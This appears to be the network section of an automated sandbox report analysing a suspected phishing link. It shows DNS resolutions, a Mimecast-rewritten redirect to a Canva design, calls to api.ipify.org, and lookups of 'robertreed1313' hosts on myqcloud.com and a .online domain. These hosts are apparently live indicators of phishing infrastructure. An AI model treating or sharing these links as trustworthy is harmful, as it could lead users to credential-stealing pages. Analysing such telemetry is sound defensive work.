                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.092880964 CET1.1.1.1192.168.2.120x2ba3No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.092880964 CET1.1.1.1192.168.2.120x2ba3No error (0)spdc-global.pbp.gysm.yahoodns.net54.171.122.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.092880964 CET1.1.1.1192.168.2.120x2ba3No error (0)spdc-global.pbp.gysm.yahoodns.net54.246.144.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.092895985 CET1.1.1.1192.168.2.120xb2a5No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.092895985 CET1.1.1.1192.168.2.120xb2a5No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.092895985 CET1.1.1.1192.168.2.120xb2a5No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.092895985 CET1.1.1.1192.168.2.120xb2a5No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.139843941 CET1.1.1.1192.168.2.120x910bNo error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.146672010 CET1.1.1.1192.168.2.120x881aNo error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.146672010 CET1.1.1.1192.168.2.120x881aNo error (0)d1w725hft9421a.cloudfront.net18.161.111.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.146672010 CET1.1.1.1192.168.2.120x881aNo error (0)d1w725hft9421a.cloudfront.net18.161.111.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.146672010 CET1.1.1.1192.168.2.120x881aNo error (0)d1w725hft9421a.cloudfront.net18.161.111.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.146672010 CET1.1.1.1192.168.2.120x881aNo error (0)d1w725hft9421a.cloudfront.net18.161.111.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.191467047 CET1.1.1.1192.168.2.120x1492No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.621742964 CET1.1.1.1192.168.2.120x16e2No error (0)p.tvpixel.com99.83.205.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:52.621742964 CET1.1.1.1192.168.2.120x16e2No error (0)p.tvpixel.com75.2.57.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.253563881 CET1.1.1.1192.168.2.120xd3a7No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.253563881 CET1.1.1.1192.168.2.120xd3a7No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.253563881 CET1.1.1.1192.168.2.120xd3a7No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.254125118 CET1.1.1.1192.168.2.120xf431No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.265341043 CET1.1.1.1192.168.2.120x77beNo error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.265341043 CET1.1.1.1192.168.2.120x77beNo error (0)d1w725hft9421a.cloudfront.net18.161.111.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.265341043 CET1.1.1.1192.168.2.120x77beNo error (0)d1w725hft9421a.cloudfront.net18.161.111.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.265341043 CET1.1.1.1192.168.2.120x77beNo error (0)d1w725hft9421a.cloudfront.net18.161.111.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.265341043 CET1.1.1.1192.168.2.120x77beNo error (0)d1w725hft9421a.cloudfront.net18.161.111.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.267224073 CET1.1.1.1192.168.2.120xe935No error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.318592072 CET1.1.1.1192.168.2.120xac21No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.318592072 CET1.1.1.1192.168.2.120xac21No error (0)spdc-global.pbp.gysm.yahoodns.net54.171.122.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.318592072 CET1.1.1.1192.168.2.120xac21No error (0)spdc-global.pbp.gysm.yahoodns.net54.246.144.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.319247007 CET1.1.1.1192.168.2.120x932cNo error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.722963095 CET1.1.1.1192.168.2.120x817cNo error (0)p.tvpixel.com75.2.57.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.722963095 CET1.1.1.1192.168.2.120x817cNo error (0)p.tvpixel.com99.83.205.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:55.603704929 CET1.1.1.1192.168.2.120xf50fNo error (0)ct.canva.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:55.603704929 CET1.1.1.1192.168.2.120xf50fNo error (0)ct.canva.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:55.603704929 CET1.1.1.1192.168.2.120xf50fNo error (0)ct.canva.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:55.603704929 CET1.1.1.1192.168.2.120xf50fNo error (0)ct.canva.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:56.199706078 CET1.1.1.1192.168.2.120x465fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:56.199706078 CET1.1.1.1192.168.2.120x465fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:56.199706078 CET1.1.1.1192.168.2.120x465fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:56.200515032 CET1.1.1.1192.168.2.120x8e54No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.703754902 CET1.1.1.1192.168.2.120x6480No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.703754902 CET1.1.1.1192.168.2.120x6480No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.703754902 CET1.1.1.1192.168.2.120x6480No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.703754902 CET1.1.1.1192.168.2.120x6480No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.803287983 CET1.1.1.1192.168.2.120xfNo error (0)ad.doubleclick.net172.217.17.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.805826902 CET1.1.1.1192.168.2.120x23bfNo error (0)ct.canva.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.805826902 CET1.1.1.1192.168.2.120x23bfNo error (0)ct.canva.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.805826902 CET1.1.1.1192.168.2.120x23bfNo error (0)ct.canva.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.805826902 CET1.1.1.1192.168.2.120x23bfNo error (0)ct.canva.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.806142092 CET1.1.1.1192.168.2.120x446cNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.255717993 CET1.1.1.1192.168.2.120xd787No error (0)6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev65.9.112.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.255717993 CET1.1.1.1192.168.2.120xd787No error (0)6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev65.9.112.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.255717993 CET1.1.1.1192.168.2.120xd787No error (0)6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev65.9.112.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.255717993 CET1.1.1.1192.168.2.120xd787No error (0)6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev65.9.112.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.524959087 CET1.1.1.1192.168.2.120xa383No error (0)ad.doubleclick.net172.217.17.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.525397062 CET1.1.1.1192.168.2.120x9b2eNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.649353981 CET1.1.1.1192.168.2.120xbefeNo error (0)adservice.google.com172.217.17.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.649400949 CET1.1.1.1192.168.2.120x2a1eNo error (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.775619030 CET1.1.1.1192.168.2.120xcf3bNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.776715994 CET1.1.1.1192.168.2.120x5ed1No error (0)googleads.g.doubleclick.net172.217.17.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.007450104 CET1.1.1.1192.168.2.120x17d1No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.008768082 CET1.1.1.1192.168.2.120x5d9eNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.008768082 CET1.1.1.1192.168.2.120x5d9eNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.008934021 CET1.1.1.1192.168.2.120xdc5cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.008934021 CET1.1.1.1192.168.2.120xdc5cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.008934021 CET1.1.1.1192.168.2.120xdc5cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.008934021 CET1.1.1.1192.168.2.120xdc5cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.009238005 CET1.1.1.1192.168.2.120x1ff9No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.009238005 CET1.1.1.1192.168.2.120x1ff9No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.010554075 CET1.1.1.1192.168.2.120x3ff3No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.010874033 CET1.1.1.1192.168.2.120xeae1No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.011231899 CET1.1.1.1192.168.2.120x5b31No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.489818096 CET1.1.1.1192.168.2.120xde2No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.490154028 CET1.1.1.1192.168.2.120x56c1No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.600285053 CET1.1.1.1192.168.2.120x15deNo error (0)adservice.google.com172.217.17.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.607100010 CET1.1.1.1192.168.2.120x3f06No error (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.888072968 CET1.1.1.1192.168.2.120x924dNo error (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.comcos.na-ashburn.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.888072968 CET1.1.1.1192.168.2.120x924dNo error (0)cos.na-ashburn.myqcloud.com49.51.77.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.888072968 CET1.1.1.1192.168.2.120x924dNo error (0)cos.na-ashburn.myqcloud.com49.51.78.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:04.022440910 CET1.1.1.1192.168.2.120xb590No error (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.comcos.na-ashburn.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:04.022440910 CET1.1.1.1192.168.2.120xb590No error (0)cos.na-ashburn.myqcloud.com49.51.78.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:04.022440910 CET1.1.1.1192.168.2.120xb590No error (0)cos.na-ashburn.myqcloud.com49.51.77.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.202265024 CET1.1.1.1192.168.2.120x98d5No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.202265024 CET1.1.1.1192.168.2.120x98d5No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.212344885 CET1.1.1.1192.168.2.120x5546No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.264070034 CET1.1.1.1192.168.2.120x37a6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.265178919 CET1.1.1.1192.168.2.120x3cdfNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.265178919 CET1.1.1.1192.168.2.120x3cdfNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.305854082 CET1.1.1.1192.168.2.120x1334No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.305854082 CET1.1.1.1192.168.2.120x1334No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.305854082 CET1.1.1.1192.168.2.120x1334No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.305854082 CET1.1.1.1192.168.2.120x1334No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:06.240794897 CET1.1.1.1192.168.2.120x8cebNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:06.246666908 CET1.1.1.1192.168.2.120xb0b8No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:07.940670013 CET1.1.1.1192.168.2.120x23d6No error (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.comcos.na-ashburn.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:07.940670013 CET1.1.1.1192.168.2.120x23d6No error (0)cos.na-ashburn.myqcloud.com49.51.77.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:07.940670013 CET1.1.1.1192.168.2.120x23d6No error (0)cos.na-ashburn.myqcloud.com49.51.78.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:08.234843969 CET1.1.1.1192.168.2.120xb27eNo error (0)robertreed1313.online162.241.71.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:11.234236956 CET1.1.1.1192.168.2.120xf1f1No error (0)robertreed1313.online162.241.71.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    0192.168.2.1249716205.139.111.12443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:24 UTC716OUTGET /s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com HTTP/1.1
                                                                                                                                                                                                                                                                    Host: url.us.m.mimecastprotect.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:24 UTC2925INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:24 GMT
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Location: https://url.us.m.mimecastprotect.com/r/Vg0t0PTdWB03w6YzIYq7rjxC1YfGqzMu5H-q2MB0uKh_5gy4emB1DoIFuQ3HEQLzivQGoOZ2z4WTQGj9iVnnpR5ZhFgtsRAmFNXaDTdRAJ8s8QSfI8YK7NGFWFAWLDD2heW0VODyavLe3Bu5Zdfbozkx5FM3afQVtBX39N06ZhcEN_SJmRVmYf10wKDEShZOqG5BIQq8uLK02EdFpfO0SgWdzbZth6KXT8qb4iC7K69snz3DOYU6_3vYNXrL06op70oVsW7TQWlI3darB4rifqJASQHCJM_CjneVLpDbLfxCiwizyLdH4ZNS-QzNKw68KzB0PJKAQoR9DbvHrsxPKyybDt4j4KTcrAZwxtzSLjpGAkmtC8NXcO-xI3a4XqHxAvUASfMtUeAMXtFmFBJuLTAMXM_QlZbswiKfoyNBlGriVPS5BNKhpISP6aTJHk1zLdejH-gynqhCTWsdOtrYUEcmCSFBgJrGpcJhs_stD1Ij6_k1Z0vug2JnjN5Mym3jVe6s_uzyVkW90OSQfNtMZWl0bAab6LP6JQrxZQFHuygoEdcWvfXxcNGxLS1RhVxrdgBuOFj3qA74_t4T6pN71XuPhjq5jU37orHc8jWouDTiSWFqobE7TebeML11i0som-mVtQK38RqT6gIAfEdvBVzy1-eNfNDGpduRqpdQSWDtx82wAW02hb5SEVoOs3aCQy_fzWXWVcT6jjbr3_qllB1DzaiJRUXt6hJv19SCRHUMGIv1k6caAa7xCmiCxUdH-97vJm1IEUnXKqMX-Yfa74t_-QZQLeIsbJs8CJEDB9JP_qF18g1BTqoS7SuEpnnNQ4ZaWqziQOnCi7roJmKXErvckq9oX9dUBQZTqcO9nZK3X6lGTQZYhxuSLJpfqnplxhOGaiF0TST8rJNmx1jN1ctGsa5ZC0CYgf1-OF7OYDkbWJdR5BeGgpzCv_Iz-BSFaQC2opCP62Dk9z_ [TRUNCATED]
                                                                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    1192.168.2.1249715205.139.111.12443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:24 UTC3361OUTGET /r/Vg0t0PTdWB03w6YzIYq7rjxC1YfGqzMu5H-q2MB0uKh_5gy4emB1DoIFuQ3HEQLzivQGoOZ2z4WTQGj9iVnnpR5ZhFgtsRAmFNXaDTdRAJ8s8QSfI8YK7NGFWFAWLDD2heW0VODyavLe3Bu5Zdfbozkx5FM3afQVtBX39N06ZhcEN_SJmRVmYf10wKDEShZOqG5BIQq8uLK02EdFpfO0SgWdzbZth6KXT8qb4iC7K69snz3DOYU6_3vYNXrL06op70oVsW7TQWlI3darB4rifqJASQHCJM_CjneVLpDbLfxCiwizyLdH4ZNS-QzNKw68KzB0PJKAQoR9DbvHrsxPKyybDt4j4KTcrAZwxtzSLjpGAkmtC8NXcO-xI3a4XqHxAvUASfMtUeAMXtFmFBJuLTAMXM_QlZbswiKfoyNBlGriVPS5BNKhpISP6aTJHk1zLdejH-gynqhCTWsdOtrYUEcmCSFBgJrGpcJhs_stD1Ij6_k1Z0vug2JnjN5Mym3jVe6s_uzyVkW90OSQfNtMZWl0bAab6LP6JQrxZQFHuygoEdcWvfXxcNGxLS1RhVxrdgBuOFj3qA74_t4T6pN71XuPhjq5jU37orHc8jWouDTiSWFqobE7TebeML11i0som-mVtQK38RqT6gIAfEdvBVzy1-eNfNDGpduRqpdQSWDtx82wAW02hb5SEVoOs3aCQy_fzWXWVcT6jjbr3_qllB1DzaiJRUXt6hJv19SCRHUMGIv1k6caAa7xCmiCxUdH-97vJm1IEUnXKqMX-Yfa74t_-QZQLeIsbJs8CJEDB9JP_qF18g1BTqoS7SuEpnnNQ4ZaWqziQOnCi7roJmKXErvckq9oX9dUBQZTqcO9nZK3X6lGTQZYhxuSLJpfqnplxhOGaiF0TST8rJNmx1jN1ctGsa5ZC0CYgf1-OF7OYDkbWJdR5BeGgpzCv_Iz-BSFaQC2opCP62Dk9z_h8jBGUnE3a8z484fBTuYyqriky8DNZHUi5Bw71lazi [TRUNCATED]
                                                                                                                                                                                                                                                                    Host: url.us.m.mimecastprotect.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:26 UTC422INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:25 GMT
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Location: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    2192.168.2.124972023.218.208.109443
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:27 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                                                                    2024-11-20 15:01:27 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                    Server: ECAcc (lpl/EF67)
                                                                                                                                                                                                                                                                    X-CID: 11
                                                                                                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                    X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=6281
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:27 GMT
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    X-CID: 2


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
